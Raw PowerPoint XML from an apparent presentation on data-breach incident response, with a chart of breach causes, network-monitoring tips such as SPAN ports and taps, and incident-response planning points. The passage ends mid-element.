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9" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="283" r:id="rId6"/>
    <p:sldId id="280" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="282" r:id="rId9"/>
    <p:sldId id="285" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="273" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="263" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="271" r:id="rId22"/>
    <p:sldId id="267" r:id="rId23"/>
    <p:sldId id="266" r:id="rId24"/>
    <p:sldId id="284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89"/>
    <a:srgbClr val="002F52"/>
    <a:srgbClr val="333333"/>
    <a:srgbClr val="016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8" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="137" d="100"/>
          <a:sy n="137" d="100"/>
        </p:scale>
        <p:origin x="222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Incidents by Breach - All Time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-4.8294653022199645E-2"/>
                  <c:y val="7.8127734033245941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9047818241469799E-2"/>
                  <c:y val="1.0483267716535462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Email</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>
4%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1662893700787402"/>
                  <c:y val="3.4190452755905515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Unknown</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>
4%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dirty="0"/>
                      <a:t>Snail Mail</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>
4%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6917486876640207E-2"/>
                  <c:y val="1.1090797244094501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Disposal Document</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>
5%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6713254593175816E-2"/>
                  <c:y val="6.8041830708661419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Stolen Computer</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>
7%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400" dirty="0"/>
                      <a:t>FraudSe</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>
8%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1400" dirty="0"/>
                      <a:t>Web
</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>13%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1400" dirty="0"/>
                      <a:t>Hack
</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>16%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z="1400" dirty="0"/>
                      <a:t>Stolen Laptop
</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                      <a:t>20%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Sheet1!$A$2:$A$12</c:f>
              <c:strCache>
                <c:ptCount val="11"/>
                <c:pt idx="0">
                  <c:v>Lost Media</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Stolen Document</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Email</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Unknown</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Snail Mail</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Disposal Document</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Stolen Computer</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>FraudSe</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Web</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Hack</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Stolen Laptop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3.0000000000000158E-2</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3.0000000000000158E-2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4.0000000000000112E-2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4.0000000000000112E-2</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>4.0000000000000112E-2</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5.0000000000000114E-2</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>7.0000000000000034E-2</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>8.0000000000000224E-2</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.13</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.16000000000000059</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.2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500"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5D3553-D34F-4697-9576-242244E66E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3D7E8ED0-BCCF-4AD4-8C4B-5AE05C3DE40B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>SPAN port (Switched Port Analyzer) or mirror port </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Can be part of SPAN local or remote VLAN</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF1F6E88-B49D-4169-B804-30D2FDF53E17}" type="parTrans" cxnId="{F3F64DF2-821E-4EB2-8725-1A69330D5855}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FF89FE6-901B-4A01-80D2-7F453B11BF3B}" type="sibTrans" cxnId="{F3F64DF2-821E-4EB2-8725-1A69330D5855}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A379616-DF03-4948-9A72-5FB68DE38FA2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Don't use external DNS resolution</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE9D4925-D3B3-424F-8FDA-BCF678410E9F}" type="parTrans" cxnId="{0A21A4A7-AED2-4764-B6D2-35314DD9CC39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B5E6A41-6BF0-4863-81A9-62C610226786}" type="sibTrans" cxnId="{0A21A4A7-AED2-4764-B6D2-35314DD9CC39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0674A34C-C374-4A5D-A0E6-50EA0AFE1AB4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13D2EB89-760B-4F84-8464-7228F41992E0}" type="parTrans" cxnId="{027CBE58-207F-4531-BA2F-667AC04D2EA2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17FF236C-06AD-4905-877A-AA490945A4FF}" type="sibTrans" cxnId="{027CBE58-207F-4531-BA2F-667AC04D2EA2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E78B271F-2F8D-4CA6-BBA7-B4E8D0DA1599}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Physical tape - TX and RX packets</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EFB2C0B-80C0-4871-9282-42206E71CA74}" type="parTrans" cxnId="{72AC491C-530E-4F57-997B-6AD9E49B8BCA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{173790CC-1280-45A0-A9AE-A116F5DEA065}" type="sibTrans" cxnId="{72AC491C-530E-4F57-997B-6AD9E49B8BCA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66BAC1CE-2501-4CB6-9FA3-0E0F7460A0C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Secure Access: use ssh and ssl, segment network</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BEC87AD-103E-4ACE-9B39-D2983B11A408}" type="parTrans" cxnId="{893DAF02-D30E-429F-8596-659ED0313D53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BD2EDC6-552A-4F1D-90C7-AA59804C06C0}" type="sibTrans" cxnId="{893DAF02-D30E-429F-8596-659ED0313D53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7BB3A55-95DE-44AB-B431-661346724782}" type="pres">
      <dgm:prSet presAssocID="{DB5D3553-D34F-4697-9576-242244E66E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053F3D6D-99F0-4359-A71F-3B811DFBD67C}" type="pres">
      <dgm:prSet presAssocID="{3D7E8ED0-BCCF-4AD4-8C4B-5AE05C3DE40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484BE21-C399-4674-8E42-D473C748CBBE}" type="pres">
      <dgm:prSet presAssocID="{3FF89FE6-901B-4A01-80D2-7F453B11BF3B}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29D20C21-130D-478D-A1C9-DE4A60DF3CFA}" type="pres">
      <dgm:prSet presAssocID="{E78B271F-2F8D-4CA6-BBA7-B4E8D0DA159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5725B70-3F79-4680-B3E9-3B4DFC5A9F28}" type="pres">
      <dgm:prSet presAssocID="{173790CC-1280-45A0-A9AE-A116F5DEA065}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{352ECFB3-3B83-4EDD-93F9-68500E77D9F3}" type="pres">
      <dgm:prSet presAssocID="{1A379616-DF03-4948-9A72-5FB68DE38FA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B51284D-52B6-40F0-AA07-1211003A6DBD}" type="pres">
      <dgm:prSet presAssocID="{1A379616-DF03-4948-9A72-5FB68DE38FA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706E796-A31C-477B-B431-207A18305157}" type="pres">
      <dgm:prSet presAssocID="{66BAC1CE-2501-4CB6-9FA3-0E0F7460A0C3}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4" custLinFactNeighborY="-74517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72AC491C-530E-4F57-997B-6AD9E49B8BCA}" srcId="{DB5D3553-D34F-4697-9576-242244E66EAF}" destId="{E78B271F-2F8D-4CA6-BBA7-B4E8D0DA1599}" srcOrd="1" destOrd="0" parTransId="{1EFB2C0B-80C0-4871-9282-42206E71CA74}" sibTransId="{173790CC-1280-45A0-A9AE-A116F5DEA065}"/>
    <dgm:cxn modelId="{E50F9E87-4DE2-45C2-B59D-F3E10055A890}" type="presOf" srcId="{0674A34C-C374-4A5D-A0E6-50EA0AFE1AB4}" destId="{EB51284D-52B6-40F0-AA07-1211003A6DBD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{639F55FA-2442-48C8-A80F-BF8E539DD71D}" type="presOf" srcId="{E78B271F-2F8D-4CA6-BBA7-B4E8D0DA1599}" destId="{29D20C21-130D-478D-A1C9-DE4A60DF3CFA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1F9C26AF-739E-494C-874D-D50205DCDA9D}" type="presOf" srcId="{DB5D3553-D34F-4697-9576-242244E66EAF}" destId="{C7BB3A55-95DE-44AB-B431-661346724782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{027CBE58-207F-4531-BA2F-667AC04D2EA2}" srcId="{1A379616-DF03-4948-9A72-5FB68DE38FA2}" destId="{0674A34C-C374-4A5D-A0E6-50EA0AFE1AB4}" srcOrd="0" destOrd="0" parTransId="{13D2EB89-760B-4F84-8464-7228F41992E0}" sibTransId="{17FF236C-06AD-4905-877A-AA490945A4FF}"/>
    <dgm:cxn modelId="{D7282C0D-F6D8-4F71-9178-16054486F910}" type="presOf" srcId="{1A379616-DF03-4948-9A72-5FB68DE38FA2}" destId="{352ECFB3-3B83-4EDD-93F9-68500E77D9F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F3F64DF2-821E-4EB2-8725-1A69330D5855}" srcId="{DB5D3553-D34F-4697-9576-242244E66EAF}" destId="{3D7E8ED0-BCCF-4AD4-8C4B-5AE05C3DE40B}" srcOrd="0" destOrd="0" parTransId="{AF1F6E88-B49D-4169-B804-30D2FDF53E17}" sibTransId="{3FF89FE6-901B-4A01-80D2-7F453B11BF3B}"/>
    <dgm:cxn modelId="{0A21A4A7-AED2-4764-B6D2-35314DD9CC39}" srcId="{DB5D3553-D34F-4697-9576-242244E66EAF}" destId="{1A379616-DF03-4948-9A72-5FB68DE38FA2}" srcOrd="2" destOrd="0" parTransId="{BE9D4925-D3B3-424F-8FDA-BCF678410E9F}" sibTransId="{2B5E6A41-6BF0-4863-81A9-62C610226786}"/>
    <dgm:cxn modelId="{81340AE3-3BF8-401F-84FD-8AEBC94FC3CE}" type="presOf" srcId="{66BAC1CE-2501-4CB6-9FA3-0E0F7460A0C3}" destId="{3706E796-A31C-477B-B431-207A18305157}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F8A008D5-0E72-4F76-9F73-15A098019BD2}" type="presOf" srcId="{3D7E8ED0-BCCF-4AD4-8C4B-5AE05C3DE40B}" destId="{053F3D6D-99F0-4359-A71F-3B811DFBD67C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{893DAF02-D30E-429F-8596-659ED0313D53}" srcId="{DB5D3553-D34F-4697-9576-242244E66EAF}" destId="{66BAC1CE-2501-4CB6-9FA3-0E0F7460A0C3}" srcOrd="3" destOrd="0" parTransId="{1BEC87AD-103E-4ACE-9B39-D2983B11A408}" sibTransId="{2BD2EDC6-552A-4F1D-90C7-AA59804C06C0}"/>
    <dgm:cxn modelId="{1931D203-2661-485E-B2D1-426CAEABAA3C}" type="presParOf" srcId="{C7BB3A55-95DE-44AB-B431-661346724782}" destId="{053F3D6D-99F0-4359-A71F-3B811DFBD67C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0F7B3966-D825-4449-9153-82EAE2292E9B}" type="presParOf" srcId="{C7BB3A55-95DE-44AB-B431-661346724782}" destId="{6484BE21-C399-4674-8E42-D473C748CBBE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{ABEF2A05-F69D-4DAD-8C9D-D1F4CA96AA46}" type="presParOf" srcId="{C7BB3A55-95DE-44AB-B431-661346724782}" destId="{29D20C21-130D-478D-A1C9-DE4A60DF3CFA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6861BF09-45D0-41A8-9AED-FD7D021037B9}" type="presParOf" srcId="{C7BB3A55-95DE-44AB-B431-661346724782}" destId="{45725B70-3F79-4680-B3E9-3B4DFC5A9F28}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3CF7EE52-23B6-4D3D-9ED5-0B8F47DC18C7}" type="presParOf" srcId="{C7BB3A55-95DE-44AB-B431-661346724782}" destId="{352ECFB3-3B83-4EDD-93F9-68500E77D9F3}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AEC08DAC-BCF4-41C8-9060-51248DFE114A}" type="presParOf" srcId="{C7BB3A55-95DE-44AB-B431-661346724782}" destId="{EB51284D-52B6-40F0-AA07-1211003A6DBD}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A261BB8A-1B1B-4AFA-9673-364D379D23A5}" type="presParOf" srcId="{C7BB3A55-95DE-44AB-B431-661346724782}" destId="{3706E796-A31C-477B-B431-207A1830515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81AB4D-2D6E-41D7-9903-38AF14F0A8F7}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/venn1" loCatId="relationship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sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F266B4CE-D06E-4467-A70A-DB76C3C0699F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Establish relationships with vendors before incident</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9550CAA-A560-4E01-9DEC-4785FA3D8C59}" type="parTrans" cxnId="{D9E2BD7A-E026-4847-A94A-A9224B007B83}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A3A5314-8498-434C-8353-4CAD30D34A9D}" type="sibTrans" cxnId="{D9E2BD7A-E026-4847-A94A-A9224B007B83}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{990ADC21-A5B5-4F86-A3F9-7322F759F92E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Consider subscribing to Cyber Response or Data Breach program</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4C67303-6D46-4374-B9E8-923F65926644}" type="parTrans" cxnId="{BE0D3F2E-81ED-4764-8FD7-C36FFA1946DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFC784AC-B401-4CCB-BC01-0597FCA33FE4}" type="sibTrans" cxnId="{BE0D3F2E-81ED-4764-8FD7-C36FFA1946DB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E18B16E2-42CC-410B-B3AD-1E96AEF68197}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Review current layers of protection, and network topology</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9112A49E-B97F-4B5D-9723-86B941AC894F}" type="parTrans" cxnId="{8E927194-0F53-420C-8889-2871FB2065B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39656514-B067-425E-B00A-D0741CC91074}" type="sibTrans" cxnId="{8E927194-0F53-420C-8889-2871FB2065B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Incident </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Response Plan</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E09C5D0-00C5-4019-B108-7D8C6D3A3F8C}" type="parTrans" cxnId="{42A65BB8-8D04-47D4-B9C5-0B58F7C106B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93767537-0A2E-4356-97FD-352E7E35C5CF}" type="sibTrans" cxnId="{42A65BB8-8D04-47D4-B9C5-0B58F7C106B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDA256BC-6CFC-416A-913C-ED7798C3A550}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Can you recognize the incident?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C709BE82-66D2-4A58-A49B-4758B51F07D3}" type="parTrans" cxnId="{50CA1DD6-67D1-4358-9D46-850484BD951A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{844E724A-61A1-4C6E-B102-AF3AFA677794}" type="sibTrans" cxnId="{50CA1DD6-67D1-4358-9D46-850484BD951A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{417C2C0C-E8DC-4B71-9587-8762E9A3708A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Is evidence properly preserved?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ECECF6E-5704-41C5-BC13-3F1F6ED4E255}" type="parTrans" cxnId="{665C0B22-95B6-4D5A-AF80-ECC4E7FF8CD9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5C15141-87E6-452B-99D9-159980DEA614}" type="sibTrans" cxnId="{665C0B22-95B6-4D5A-AF80-ECC4E7FF8CD9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1007118-B0F9-4B78-A816-4100C8771D6F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
